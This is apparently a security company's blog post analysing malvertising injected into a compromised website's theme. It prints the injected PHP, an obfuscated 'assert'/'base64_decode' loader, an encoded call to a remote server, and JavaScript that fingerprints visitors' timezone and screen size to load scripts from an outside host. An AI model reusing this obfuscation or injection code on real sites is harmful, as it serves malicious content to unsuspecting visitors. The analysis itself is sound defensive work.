When a website is compromised, one of the most interesting and challenging tasks we perform is identifying all malware to prevent attackers from regaining access to the resource. They may use different type of malicious codes and techniques depending on their final objectives.
In this particular case, during the remediation process the client mentioned that his users were seeing some type of malvertising, but he couldn’t replicate the issue. We investigated it further and identified the following :
- A malicious code was injected into the theme’s file :
<?php $_00022b92=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/stat000.php ></script> ";};$_00022b92=1; ?>
– It included another file “stat000.php” :
/**/ <?php $dnoxemvhz=chr(97)."x73"."s"."e"."r"."t"; $bckttxtt="b".chr(97)."x73"."e".chr(54)."4"."x5f"."d"."e"."x63"."x6f".chr(100).chr(101); @$dnoxemvhz( @$bckttxtt( 'ZXZhbCb2tSMHhQ … long base64 string ...TTlKScpKTs=')); ########################################################## ?> /**/ //php_off
– When decoding the file I found that it made a request to:
$url_to="h"."t".chr(116)."x70"."x3a"."x2f"."/"."x70"."x69"."x63".chr(108).chr(105)."x73"."x74".chr(112)."x72"."o"."x74".chr(101).chr(99)."x74"."x2e"."x6e".chr(101)."x74"."/"."i"."x64"."4".chr(46)."x70"."h".chr(112);
Which decodes to “hxxp://piclistprotect.net/id4.php” ( taken offline )
The remote server then responded with this final payload :
function tzSignature() { var tz; try { var currDate = new Date(); var currTime = currDate.toString(); tz = currDate.getTimezoneOffset(); if ( (currTime.indexOf("PDT") > 0) || (currTime.indexOf("MDT") > 0) || (currTime.indexOf("CDT") > 0) || (currTime.indexOf("EDT") > 0) || (currTime.indexOf("Daylight") > 0) ) tz += 60; tz = - tz / 60; } catch (e) { tz = ""; } return tz; } function rsSignature() { var rs; try { var rsWidth = screen.width; var rsHeight = screen.height; var rs = rsWidth + "x" + rsHeight; } catch (e) { rs = ""; } return rs; } var script = document.createElement("script"); script.src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz="+tzSignature()+'&rs='+rsSignature(); document.head.appendChild(script); //document.write('<sc'+'ript type="text/javascript" src="hxxp://profixsysline.net//plix/scaner.php?id=4&tz='+i+'&rs='+rsSignature()+'"></sc'+'ript>');
– As you can see, it uses two main functions : rsSignature() that returns the screen resolution and tzSignature() that returns the timezone which the page viewer is in. It passes those parameters to the “tz” and “rs” parameters like so : “hxxp://profixsysline.net//plix/scaner.php?id=4&tz=&rs=”
Conclusion :
Attackers are constantly trying to be more efficient with their injections in order to only target certain victims. This malicious code serves specific ads to different timezones. We have been remediating lots of these types of injections lately. However, our http://sitecheck.sucuri.net/ scanner detects these types of injections and will warn you if there are any issues on your site.